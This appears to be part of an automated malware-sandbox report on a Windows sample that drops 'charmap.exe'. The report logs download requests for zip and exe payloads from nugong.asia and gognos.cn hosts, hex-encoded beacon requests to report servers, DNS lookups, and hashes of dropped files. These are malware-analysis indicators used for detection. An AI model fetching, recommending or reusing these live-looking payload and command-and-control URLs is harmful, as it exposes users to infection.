      x-cos-request-id: NjUyZjQ0ZTRfMmVjYzExMGJfYzc0MV84OTBhYWE4
      Content-Length: 153522
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 2161620244003400841
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/pgm/mds/62761afc2f0d796a/2087d126bded15fb341729d845ab26d5124b01e56782ef7664.zip
      charmap.exe
      Remote address:
      119.167.229.212:80
      Request
      GET /pgm/mds/62761afc2f0d796a/2087d126bded15fb341729d845ab26d5124b01e56782ef7664.zip HTTP/1.1
      Host: down.nugong.asia
      User-Agent: CHM_MSDN
      Response
      HTTP/1.1 200 OK
      Last-Modified: Mon, 13 Nov 2023 05:36:13 GMT
      Etag: "33a70d7d11445ae0e98eea790c06fdd0"
      Content-Type: application/zip
      Date: Mon, 13 Nov 2023 05:39:21 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 17548609442877028985
      x-cos-request-id: NjU1MWI2ODlfYjczNTY4MDlfMWJhNV82YWQzNjc5
      Content-Length: 980299
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 1647302354324036148
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/pgm/mds/865609897d54b79b/502855f63d5364d77a01f5e8125b4fe59af4f34fd4851c3764.zip
      charmap.exe
      Remote address:
      119.167.229.212:80
      Request
      GET /pgm/mds/865609897d54b79b/502855f63d5364d77a01f5e8125b4fe59af4f34fd4851c3764.zip HTTP/1.1
      Host: down.nugong.asia
      User-Agent: CHM_MSDN
      Response
      HTTP/1.1 200 OK
      Last-Modified: Tue, 10 Oct 2023 09:27:24 GMT
      Etag: "c54f8dd4a616b44898e054837fe698bc"
      Content-Type: application/zip
      Date: Wed, 18 Oct 2023 02:37:24 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 11477013737684468114
      x-cos-request-id: NjUyZjQ0ZTRfYjQ5ZjA4MDlfYjc4M180NWFjN2M1
      Content-Length: 153529
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 16758888000343519892
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://nreprot.nugong.asia/report/report_data?data=b26a79cea204f54a9c370b6a1cccc50b5bb992835b01fa10452c1698483b553b4ecd305bdb80e30556bab29d9ba195bc7bc425e6c3a804fc8bdd9aa5cee13373d3a8a13b86b22f6aea7db0c272a92108cf7c966ec1eccdeb593526ac8f755910c04aca2c7a3f39c378f01a4751e77a7009a7a10d3d84969ce72f245e6122069982534a4a432e7b61fff47230c8b5824ca5ef63f534d272b5f34582aa287656a831207e053344fd01d723f227f882cdcccb67fc75af9b657a95f61a3df209afa47ae8d60efbb076a5c109c87ede643cf4b4f8e713b5cf2e8c2844bb4914a3a3fcfbeae9da6cd101082eea80d9643860c6c02fe0a87c82927cab3946545e2e1c00ffa7dc35dde4b8a7c6cea977c468cf5558d7b5fa41e180ffe0ed3f5740fe236accf4a104cc54fac8007c3343247e6e40a657d3a3bb35005efd9b3bc962b98bef31e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477cdc4e777cfcca46bb56e16d20d65e3ee7660bf3c537d0053b77c03eaa4923a06508288210481b5150330b26ef92ca523a743d1b3264d937bc2c115085abd46b8eae6ec9c6f288b201f198a8d3977c5dade52cb1bd1e9d4b257afb8be23307c5c51199d3bf86790578155e9069f078b6b30d30d3a11649c2629418689e87302c7f30f094c60c5a7b3d6d0f4fbb03cd1360b4ca7ff4ef710ea4c18c7b1f75c0ef0ee926d4fe67aee11fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12
      charmap.exe
      Remote address:
      119.167.229.212:80
      Request
      GET /report/report_data?data=b26a79cea204f54a9c370b6a1cccc50b5bb992835b01fa10452c1698483b553b4ecd305bdb80e30556bab29d9ba195bc7bc425e6c3a804fc8bdd9aa5cee13373d3a8a13b86b22f6aea7db0c272a92108cf7c966ec1eccdeb593526ac8f755910c04aca2c7a3f39c378f01a4751e77a7009a7a10d3d84969ce72f245e6122069982534a4a432e7b61fff47230c8b5824ca5ef63f534d272b5f34582aa287656a831207e053344fd01d723f227f882cdcccb67fc75af9b657a95f61a3df209afa47ae8d60efbb076a5c109c87ede643cf4b4f8e713b5cf2e8c2844bb4914a3a3fcfbeae9da6cd101082eea80d9643860c6c02fe0a87c82927cab3946545e2e1c00ffa7dc35dde4b8a7c6cea977c468cf5558d7b5fa41e180ffe0ed3f5740fe236accf4a104cc54fac8007c3343247e6e40a657d3a3bb35005efd9b3bc962b98bef31e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477cdc4e777cfcca46bb56e16d20d65e3ee7660bf3c537d0053b77c03eaa4923a06508288210481b5150330b26ef92ca523a743d1b3264d937bc2c115085abd46b8eae6ec9c6f288b201f198a8d3977c5dade52cb1bd1e9d4b257afb8be23307c5c51199d3bf86790578155e9069f078b6b30d30d3a11649c2629418689e87302c7f30f094c60c5a7b3d6d0f4fbb03cd1360b4ca7ff4ef710ea4c18c7b1f75c0ef0ee926d4fe67aee11fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12 HTTP/1.1
      Host: nreprot.nugong.asia
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.17.6.1 Unicorn
      Date: Thu, 16 Nov 2023 12:04:06 GMT
      Content-Type: text/html; charset=utf-8
      X-AspNetMvc-Version: 5.2
      X-AspNet-Version: 4.0.30319
      X-Powered-By: ASP.NET
      X-Cache-Lookup: Cache Miss
      X-Cache-Lookup: Hit From Inner Cluster
      Cache-Control: private
      Content-Length: 3
      X-NWS-LOG-UUID: 248686452332715798
      Connection: keep-alive
      X-Cache-Lookup: Cache Miss
    • flag-cn
      GET
      http://mprrpt.nugong.asia/report.php?data=b26a79cea204f54a9c370b6a1cccc50b5bb992835b01fa10452c1698483b553b4ecd305bdb80e30556bab29d9ba195bc7bc425e6c3a804fc8bdd9aa5cee13373d3a8a13b86b22f6aea7db0c272a92108cf7c966ec1eccdeb593526ac8f755910c04aca2c7a3f39c378f01a4751e77a7009a7a10d3d84969ce72f245e6122069982534a4a432e7b61fff47230c8b5824ca5ef63f534d272b5f34582aa287656a831207e053344fd01d723f227f882cdcccb67fc75af9b657a95f61a3df209afa47ae8d60efbb076a5c109c87ede643cf4b4f8e713b5cf2e8c2844bb4914a3a3fcfbeae9da6cd101082eea80d9643860c6c02fe0a87c82927cab3946545e2e1c00ffa7dc35dde4b8a7c6cea977c468cf5558d7b5fa41e180ffe0ed3f5740fe236accf4a104cc54fac8007c3343247e6e40a657d3a3bb35005efd9b3bc962b98bef31e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477cdc4e777cfcca46bb56e16d20d65e3ee7660bf3c537d0053b77c03eaa4923a06508288210481b5150330b26ef92ca523a743d1b3264d937bc2c115085abd46b8eae6ec9c6f288b201f198a8d3977c5dade52cb1bd1e9d4b257afb8be23307c5c51199d3bf86790578155e9069f078b6b30d30d3a11649c2629418689e87302c7f30f094c60c5a7b3d6d0f4fbb03cd1360b4ca7ff4ef710ea4c18c7b1f75c0ef0ee926d4fe67aee11fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12
      charmap.exe
      Remote address:
      119.167.229.212:80
      Request
      GET /report.php?data=b26a79cea204f54a9c370b6a1cccc50b5bb992835b01fa10452c1698483b553b4ecd305bdb80e30556bab29d9ba195bc7bc425e6c3a804fc8bdd9aa5cee13373d3a8a13b86b22f6aea7db0c272a92108cf7c966ec1eccdeb593526ac8f755910c04aca2c7a3f39c378f01a4751e77a7009a7a10d3d84969ce72f245e6122069982534a4a432e7b61fff47230c8b5824ca5ef63f534d272b5f34582aa287656a831207e053344fd01d723f227f882cdcccb67fc75af9b657a95f61a3df209afa47ae8d60efbb076a5c109c87ede643cf4b4f8e713b5cf2e8c2844bb4914a3a3fcfbeae9da6cd101082eea80d9643860c6c02fe0a87c82927cab3946545e2e1c00ffa7dc35dde4b8a7c6cea977c468cf5558d7b5fa41e180ffe0ed3f5740fe236accf4a104cc54fac8007c3343247e6e40a657d3a3bb35005efd9b3bc962b98bef31e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477cdc4e777cfcca46bb56e16d20d65e3ee7660bf3c537d0053b77c03eaa4923a06508288210481b5150330b26ef92ca523a743d1b3264d937bc2c115085abd46b8eae6ec9c6f288b201f198a8d3977c5dade52cb1bd1e9d4b257afb8be23307c5c51199d3bf86790578155e9069f078b6b30d30d3a11649c2629418689e87302c7f30f094c60c5a7b3d6d0f4fbb03cd1360b4ca7ff4ef710ea4c18c7b1f75c0ef0ee926d4fe67aee11fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12 HTTP/1.1
      Host: mprrpt.nugong.asia
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.19.1.1 Unicorn
      Date: Thu, 16 Nov 2023 12:04:06 GMT
      Content-Type: application/octet-stream
      Content-Type: text/html
      X-Cache-Lookup: Cache Miss
      Content-Length: 3
      X-NWS-LOG-UUID: 15826347961273132102
      Connection: keep-alive
      X-Cache-Lookup: Cache Miss
    • flag-us
      DNS
      feoin.gognos.cn
      charmap.exe
      Remote address:
      8.8.8.8:53
      Request
      feoin.gognos.cn
      IN A
      Response
      feoin.gognos.cn
      IN A
      43.249.192.68
      feoin.gognos.cn
      IN A
      222.173.195.26
    • flag-cn
      GET
      http://feoin.gognos.cn:59115/codfk15.exe
      charmap.exe
      Remote address:
      43.249.192.68:59115
      Request
      GET /codfk15.exe HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
      Host: feoin.gognos.cn:59115
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Content-Type: application/octet-stream
      Last-Modified: Wed, 08 Nov 2023 13:21:26 GMT
      Accept-Ranges: bytes
      ETag: "e3c1f4794612da1:0"
      Server: Microsoft-IIS/7.5
      X-Powered-By: ASP.NET
      Date: Thu, 16 Nov 2023 12:04:08 GMT
      Content-Length: 14780000
    • 119.167.229.212:443
      down.nugong.asia
      tls
      aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
      13.1kB
      486.6kB
      242
      363
    • 119.167.229.212:80
      http://down.nugong.asia/cfg/cmc/urlmd5.json
      http
      charmap.exe
      75.6kB
      2.7MB
      1311
      1979

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/ping.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/ping.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/userchange.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/userpq.zip

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/blacklist.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/user/c995ec7fd4f57c0d/a8f5d6fe5664609d.json

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/pub/ms.json

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/pub/ps.json

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/pgm/mds/186dc678628340ee/90a22928787e3b5a341729d845ab26d5f93b9db0120714d864.zip

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/pgm/mds/05631e93ccdb00ee/945f98f10df53a8f1cfb3848c371d6e3829473480dc6631564.zip

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/pgm/mds/006866ef1b75dc55/30d51089d778d32a4d22077fb983ba81fd82d4cf417ac62464.zip

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/Lander.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/psexe.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/urlmd5.json

      HTTP Response

      200
    • 101.227.134.49:443
      https://apps.game.qq.com/comm-htdocs/ip/get_ip.php
      tls, http
      charmap.exe
      1.4kB
      5.1kB
      15
      13

      HTTP Request

      GET https://apps.game.qq.com/comm-htdocs/ip/get_ip.php

      HTTP Response

      200
    • 119.167.229.212:443
      down.nugong.asia
      tls
      aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
      1.5kB
      1.1kB
      10
      11
    • 36.143.236.7:80
      http://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D
      http
      aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
      910 B
      3.2kB
      9
      6

      HTTP Request

      GET http://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D

      HTTP Response

      200
    • 47.246.48.205:80
      http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D
      http
      charmap.exe
      734 B
      2.1kB
      6
      4

      HTTP Request

      GET http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3D

      HTTP Response

      200

      HTTP Request

      GET http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D

      HTTP Response

      200
    • 103.235.47.7:443
      https://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json
      tls, http
      charmap.exe
      1.5kB
      11.3kB
      19
      22

      HTTP Request

      GET https://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json

      HTTP Response

      200
    • 104.18.20.226:80
      http://crl.globalsign.com/root-r3.crl
      http
      charmap.exe
      359 B
      2.6kB
      5
      4

      HTTP Request

      GET http://crl.globalsign.com/root-r3.crl

      HTTP Response

      200
    • 104.18.21.226:80
      http://ocsp2.globalsign.com/rootr3/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBT1nGh%2FJBjWKnkPdZIzB1bqhelHBwQUj%2FBLf6guRSSuTVD6Y5qL3uLdG7wCDQHuXyId%2FGI71DM6hVc%3D
      http
      charmap.exe
      473 B
      2.1kB
      5
      4

      HTTP Request

      GET http://ocsp2.globalsign.com/rootr3/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBT1nGh%2FJBjWKnkPdZIzB1bqhelHBwQUj%2FBLf6guRSSuTVD6Y5qL3uLdG7wCDQHuXyId%2FGI71DM6hVc%3D

      HTTP Response

      200
    • 119.167.229.212:80
      http://mprrpt.nugong.asia/report.php?data=b26a79cea204f54a9c370b6a1cccc50b5bb992835b01fa10452c1698483b553b4ecd305bdb80e30556bab29d9ba195bc7bc425e6c3a804fc8bdd9aa5cee13373d3a8a13b86b22f6aea7db0c272a92108cf7c966ec1eccdeb593526ac8f755910c04aca2c7a3f39c378f01a4751e77a7009a7a10d3d84969ce72f245e6122069982534a4a432e7b61fff47230c8b5824ca5ef63f534d272b5f34582aa287656a831207e053344fd01d723f227f882cdcccb67fc75af9b657a95f61a3df209afa47ae8d60efbb076a5c109c87ede643cf4b4f8e713b5cf2e8c2844bb4914a3a3fcfbeae9da6cd101082eea80d9643860c6c02fe0a87c82927cab3946545e2e1c00ffa7dc35dde4b8a7c6cea977c468cf5558d7b5fa41e180ffe0ed3f5740fe236accf4a104cc54fac8007c3343247e6e40a657d3a3bb35005efd9b3bc962b98bef31e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477cdc4e777cfcca46bb56e16d20d65e3ee7660bf3c537d0053b77c03eaa4923a06508288210481b5150330b26ef92ca523a743d1b3264d937bc2c115085abd46b8eae6ec9c6f288b201f198a8d3977c5dade52cb1bd1e9d4b257afb8be23307c5c51199d3bf86790578155e9069f078b6b30d30d3a11649c2629418689e87302c7f30f094c60c5a7b3d6d0f4fbb03cd1360b4ca7ff4ef710ea4c18c7b1f75c0ef0ee926d4fe67aee11fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12
      http
      charmap.exe
      28.7kB
      1.3MB
      552
      969

      HTTP Request

      GET http://down.nugong.asia/pgm/mds/b9aa4771a06003c1/4c3c71ab6fb06a3ec85c07a85e2af9e361998acec86eaa1e64.zip

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/pgm/mds/62761afc2f0d796a/2087d126bded15fb341729d845ab26d5124b01e56782ef7664.zip

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/pgm/mds/865609897d54b79b/502855f63d5364d77a01f5e8125b4fe59af4f34fd4851c3764.zip

      HTTP Response

      200

      HTTP Request

      GET http://nreprot.nugong.asia/report/report_data?data=b26a79cea204f54a9c370b6a1cccc50b5bb992835b01fa10452c1698483b553b4ecd305bdb80e30556bab29d9ba195bc7bc425e6c3a804fc8bdd9aa5cee13373d3a8a13b86b22f6aea7db0c272a92108cf7c966ec1eccdeb593526ac8f755910c04aca2c7a3f39c378f01a4751e77a7009a7a10d3d84969ce72f245e6122069982534a4a432e7b61fff47230c8b5824ca5ef63f534d272b5f34582aa287656a831207e053344fd01d723f227f882cdcccb67fc75af9b657a95f61a3df209afa47ae8d60efbb076a5c109c87ede643cf4b4f8e713b5cf2e8c2844bb4914a3a3fcfbeae9da6cd101082eea80d9643860c6c02fe0a87c82927cab3946545e2e1c00ffa7dc35dde4b8a7c6cea977c468cf5558d7b5fa41e180ffe0ed3f5740fe236accf4a104cc54fac8007c3343247e6e40a657d3a3bb35005efd9b3bc962b98bef31e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477cdc4e777cfcca46bb56e16d20d65e3ee7660bf3c537d0053b77c03eaa4923a06508288210481b5150330b26ef92ca523a743d1b3264d937bc2c115085abd46b8eae6ec9c6f288b201f198a8d3977c5dade52cb1bd1e9d4b257afb8be23307c5c51199d3bf86790578155e9069f078b6b30d30d3a11649c2629418689e87302c7f30f094c60c5a7b3d6d0f4fbb03cd1360b4ca7ff4ef710ea4c18c7b1f75c0ef0ee926d4fe67aee11fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12

      HTTP Response

      200

      HTTP Request

      GET http://mprrpt.nugong.asia/report.php?data=b26a79cea204f54a9c370b6a1cccc50b5bb992835b01fa10452c1698483b553b4ecd305bdb80e30556bab29d9ba195bc7bc425e6c3a804fc8bdd9aa5cee13373d3a8a13b86b22f6aea7db0c272a92108cf7c966ec1eccdeb593526ac8f755910c04aca2c7a3f39c378f01a4751e77a7009a7a10d3d84969ce72f245e6122069982534a4a432e7b61fff47230c8b5824ca5ef63f534d272b5f34582aa287656a831207e053344fd01d723f227f882cdcccb67fc75af9b657a95f61a3df209afa47ae8d60efbb076a5c109c87ede643cf4b4f8e713b5cf2e8c2844bb4914a3a3fcfbeae9da6cd101082eea80d9643860c6c02fe0a87c82927cab3946545e2e1c00ffa7dc35dde4b8a7c6cea977c468cf5558d7b5fa41e180ffe0ed3f5740fe236accf4a104cc54fac8007c3343247e6e40a657d3a3bb35005efd9b3bc962b98bef31e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477cdc4e777cfcca46bb56e16d20d65e3ee7660bf3c537d0053b77c03eaa4923a06508288210481b5150330b26ef92ca523a743d1b3264d937bc2c115085abd46b8eae6ec9c6f288b201f198a8d3977c5dade52cb1bd1e9d4b257afb8be23307c5c51199d3bf86790578155e9069f078b6b30d30d3a11649c2629418689e87302c7f30f094c60c5a7b3d6d0f4fbb03cd1360b4ca7ff4ef710ea4c18c7b1f75c0ef0ee926d4fe67aee11fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12

      HTTP Response

      200
    • 43.249.192.68:59115
      http://feoin.gognos.cn:59115/codfk15.exe
      http
      charmap.exe
      288.1kB
      15.2MB
      5872
      10873

      HTTP Request

      GET http://feoin.gognos.cn:59115/codfk15.exe

      HTTP Response

      200
    • 8.8.8.8:53
      54e03c235962947852b3fe22714547f2.vbnm34567.xyz
      dns
      aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
      184 B
      334 B
      2
      2

      DNS Request

      54e03c235962947852b3fe22714547f2.vbnm34567.xyz

      DNS Request

      54e03c235962947852b3fe22714547f2.vbnm34567.xyz

    • 114.114.114.114:53
      down.nugong.asia
      dns
      aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
      62 B
      392 B
      1
      1

      DNS Request

      down.nugong.asia

      DNS Response

      119.167.229.212
      123.12.213.220
      123.12.213.243
      211.93.212.232
      218.29.50.234
      221.15.67.145
      36.248.54.85
      123.12.213.187
      118.212.235.109
      58.144.226.248
      110.249.196.101
      118.212.235.102
      42.56.81.104
      118.212.235.231
      42.231.136.215

    • 8.8.8.8:53
      apps.game.qq.com
      dns
      charmap.exe
      62 B
      94 B
      1
      1

      DNS Request

      apps.game.qq.com

      DNS Response

      101.227.134.49
      101.227.134.27

    • 8.8.8.8:53
      ocsp.trust-provider.cn
      dns
      aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
      68 B
      300 B
      1
      1

      DNS Request

      ocsp.trust-provider.cn

      DNS Response

      36.143.236.7
      36.248.38.100
      111.13.153.152
      111.48.138.18
      111.206.23.199
      112.50.95.96
      117.27.246.96
      119.36.90.164

    • 8.8.8.8:53
      ocsp.digicert.cn
      dns
      charmap.exe
      62 B
      122 B
      1
      1

      DNS Request

      ocsp.digicert.cn

      DNS Response

      47.246.48.205

    • 8.8.8.8:53
      sp1.baidu.com
      dns
      charmap.exe
      59 B
      176 B
      1
      1

      DNS Request

      sp1.baidu.com

      DNS Response

      103.235.47.7
      103.235.47.102
      103.235.47.103
      103.235.46.40

    • 8.8.8.8:53
      crl.globalsign.com
      dns
      charmap.exe
      64 B
      179 B
      1
      1

      DNS Request

      crl.globalsign.com

      DNS Response

      104.18.20.226
      104.18.21.226

    • 234.2.2.2:10320
      charmap.exe
      46 B
      1
    • 233.123.112.211:53769
      charmap.exe
      1.1kB
      12
    • 255.255.255.255:2641
      charmap.exe
      60 B
      1
    • 8.8.8.8:53
      feoin.gognos.cn
      dns
      charmap.exe
      61 B
      93 B
      1
      1

      DNS Request

      feoin.gognos.cn

      DNS Response

      43.249.192.68
      222.173.195.26

    • 234.2.2.2:10320
      charmap.exe
      46 B
      1
    • 234.2.2.2:10320
      charmap.exe
      46 B
      1

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\autofmt.exe

      Filesize

      746KB

      MD5

      04fafcaf36632e03b6bfc48275178349

      SHA1

      41191fd8abc13c88aec5a46281d1082a958ed2ff

      SHA256

      c45ee812712c7484d3869811af63d6e78ef885054fe702662104bde5635d8a73

      SHA512

      a251178601db5b53849a7514fc98853720d71e461373e3701289ca9d0c782edf63516bdedc60c17a0d0521db9bfb996a4ffe0d88ddd9ae8c875490bcf47c5f2e

    • C:\Users\Admin\AppData\Local\Temp\Cab52A4.tmp

      Filesize

      61KB

      MD5

      f3441b8572aae8801c04f3060b550443

      SHA1

      4ef0a35436125d6821831ef36c28ffaf196cda15

      SHA256

      6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

      SHA512

      5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

    • C:\Users\Admin\AppData\Local\Temp\Tar7219.tmp

      Filesize

      163KB

      MD5

      9441737383d21192400eca82fda910ec

      SHA1

      725e0d606a4fc9ba44aa8ffde65bed15e65367e4

      SHA256

      bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

      SHA512

      7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

    • C:\Users\Admin\AppData\Local\Temp\a18c84b5.tmp

      Filesize

      14.1MB

      MD5

      b66fb2f31bbc7538ade44d5f5d57675f

      SHA1

      30c2444dc89cbd6f099d21f00d432ade619ad13d

      SHA256

      3b09106f7813ab3e5b7350d269446298291a2722bdf65f705c749725c11fc2a5

      SHA512

      631307a706880c9fa87dc676169f6130c8150d266823dd7e446a29ea0726b9c81d1944f2cbdb3421b81a7770be90231dbc766aaa3d2cec16265c6f8249f47580

    • C:\charmap.exe

      Filesize

      162KB

      MD5

      b4c2ce57f51b9f62956d256eb68973ed

      SHA1

      c6e1ff5d4720d344da996c128f987ce64354e584

      SHA256

      d584f2cdb5b31af93bb7e7e188a7575eafe18e0a786f36bd1236cac79d9bfaa4

      SHA512

      8bcdcf560c69e4bac0f2c611cbf7c27a347fdb00ceb9a160a117a0abffcc7763e2f7d4b8eecc1bccae3316c4dc69a2df75ddbde3222f63bc7fed5ef8b76f7921

    • memory/420-42-0x0000000000870000-0x0000000000898000-memory.dmp

      Filesize

      160KB

    • memory/420-43-0x0000000000870000-0x0000000000898000-memory.dmp

      Filesize

      160KB

    • memory/1304-86-0x0000000006BE0000-0x0000000006CD7000-memory.dmp

      Filesize

      988KB

    • memory/1304-20-0x0000000006BE0000-0x0000000006CD7000-memory.dmp

      Filesize

      988KB

    • memory/1304-16-0x0000000002A70000-0x0000000002A73000-memory.dmp

      Filesize

      12KB

    • memory/1304-121-0x0000000005310000-0x00000000054D5000-memory.dmp

      Filesize

      1.8MB

    • memory/1304-116-0x0000000002A80000-0x0000000002A81000-memory.dmp

      Filesize

      4KB

    • memory/1304-17-0x0000000002A70000-0x0000000002A73000-memory.dmp

      Filesize

      12KB

    • memory/1304-18-0x0000000002A70000-0x0000000002A73000-memory.dmp

      Filesize

      12KB

    • memory/1304-69-0x0000000006BE0000-0x0000000006CD7000-memory.dmp

      Filesize

      988KB

    • memory/1304-19-0x0000000006BE0000-0x0000000006CD7000-memory.dmp

      Filesize

      988KB

    • memory/2788-97-0x0000000001FE0000-0x0000000001FE1000-memory.dmp

      Filesize

      4KB

    • memory/2788-103-0x0000000001FE0000-0x0000000001FE1000-memory.dmp

      Filesize

      4KB

    • memory/2788-39-0x0000000001CD0000-0x0000000001D9B000-memory.dmp

      Filesize

      812KB

    • memory/2788-37-0x0000000001CD0000-0x0000000001D9B000-memory.dmp

      Filesize

      812KB

    • memory/2788-36-0x0000000001CD0000-0x0000000001D9B000-memory.dmp

      Filesize

      812KB

    • memory/2788-87-0x0000000001CD0000-0x0000000001D9B000-memory.dmp

      Filesize

      812KB

    • memory/2788-94-0x0000000037510000-0x0000000037520000-memory.dmp

      Filesize

      64KB

    • memory/2788-96-0x0000000001FE0000-0x0000000001FE1000-memory.dmp

      Filesize

      4KB

    • memory/2788-28-0x00000000001B0000-0x00000000001B1000-memory.dmp

      Filesize

      4KB

    • memory/2788-98-0x0000000001FE0000-0x0000000001FE1000-memory.dmp

      Filesize

      4KB

    • memory/2788-99-0x0000000001FE0000-0x0000000001FE1000-memory.dmp

      Filesize

      4KB

    • memory/2788-100-0x0000000001FE0000-0x0000000001FE1000-memory.dmp

      Filesize

      4KB

    • memory/2788-101-0x0000000001FE0000-0x0000000001FE1000-memory.dmp

      Filesize

      4KB

    • memory/2788-38-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp

      Filesize

      64KB

